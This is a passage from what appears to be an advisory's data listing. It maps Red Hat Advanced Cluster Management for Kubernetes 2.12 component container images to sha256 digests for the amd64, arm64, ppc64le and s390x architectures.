"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
